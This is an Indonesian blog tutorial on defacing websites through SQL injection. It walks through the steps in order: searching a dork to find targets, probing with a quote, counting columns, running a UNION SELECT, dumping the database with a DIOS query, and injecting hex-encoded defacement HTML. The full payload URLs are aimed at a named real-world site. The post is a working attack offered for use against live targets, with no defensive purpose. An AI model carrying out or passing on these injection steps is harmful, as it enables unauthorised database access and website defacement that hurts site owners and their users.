Laporkan Jika Terdapat Bug! Contact Us Report!
Home
deface
News

Cara Deface SQL Injection

Cara Deface SQL Injection

 Cara Deface SQL Injection





Oke gengs balik lagi ma gua Gim!
Gua kali ini akan share Cara Deface SQL Injection

Simak gengs!

Bahan yang harus kalian siapkan!
1.Dork "inurl: newsitem.php?id=8" (kembangkan lagi)
2.AnonHackbar apk
3.Browser


Oke langsung aja!

Pertama-tama kalian search dulu dork nya dibrowser kalian!


Kalian pilih targetnya!


Kalian copy link targetnya!
Dan paste di apk anonhackbar

Untuk mengetahui website vuln tidaknya kalian tambahkan tanda kutip ' di belakang id nya!
Jadinya https://www.cordoganclark.com/newsitem.php?id='8 lalu kalian execute



Jika website tersebut vuln, maka website tersebut akan eror seperti ini!



Setelah itu kalian test menggunakan SQL string based "order+by+1--+-"
Kalian pilih string based di anonhackbar ya!

Pilih order by

Kita coba tambahkan kolom 1
Dan ternyata belum eror

Kita coba menambahkan 7 kolom
Jadinya https://www.cordoganclark.com/newsitem.php?id=8+order+by+7--+-
Dan ternyata eror!


Oke setelah ketemu kolomnya di 7 kita ganti menggunakan SQL string "union+select+6--+-"
Ambil 1 angka dibelakang angka yang eror tadi Jadinya https://www.cordoganclark.com/newsitem.php?id=8+union+select+1,2,3,4,5,6--+-


Kalo berhasil maka si nomor vuln togel nya keluar!
Nomor togelnya yaitu 4 dan 5. Nomor tersebut adalah angka celah/bug pada sqlnya.
Setelah itu kalian tambah Dios pada angka togelnya yaitu di angka 5
Caranya, kalian pilih string based pada anonhackbar!

Pada nomor togel 5 kalian ganti dengan Dios yang ada di string based!
Pilih Dios yang mana saja


Jika berhasil maka database server site akan terlihat seperti ini!
Setelah itu pada nomor togel 4 kalian ganti dengan

<center><img title="GimXSec7" src="https://i.top4top.io/p_21888x8fw1.jpeg" width="200" height="300"><br><i><font color="black"size="6">Injected by<font color="red">./L3tterFake</font></center>

Tetapi kalian convert dulu dari tex ke hex code!
Caranya, kalian buka Link ini buat convert nya
Kalian copy hex nya!

Lalu kalian paste di nomor togel 4 tapi kalian tambahkan 0x didepan hex!

Jadinya seperti ini!

https://www.cordoganclark.com/newsitem.php?id=8+union+select+1,2,3,0x3C696D67207469746C653D2247696D585365633722207372633D2268747470733A2F2F692E746F7034746F702E696F2F705F323138383878386677312E6A706567222077696474683D2232303022206865696768743D22333030223E3C62723E3C693E3C666F6E7420636F6C6F723D2277686974652273697A653D2236223E496E6A65637465642062793C666F6E7420636F6C6F723D22726564223E2E2F4C337474657246616B65,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),6--+-

Maka hasilnya!

Tutorial ini terbilang dasar untuk Deface SQL, ada beberapa cara Deface SQL untuk upshell, bypass dll. Namun saat ini hanya ini saja yang gua share!

Bagi yang kurang jelas dan kurang paham bisa chat di kolom komentar di bawah ini!

Sekian tutorial nya Terima Kasih!

Rate this article

Loading...
I am a student who has a hobby of writing articles and blogs I am a student who has a hobby of writing articles and blogs

Post a Comment

Cookies Consent

This website uses cookies to ensure you get the best experience on our website.

Cookies Policy

We employ the use of cookies. By accessing Lantro UI, you agreed to use cookies in agreement with the Lantro UI's Privacy Policy.

Most interactive websites use cookies to let us retrieve the user’s details for each visit. Cookies are used by our website to enable the functionality of certain areas to make it easier for people visiting our website. Some of our affiliate/advertising partners may also use cookies.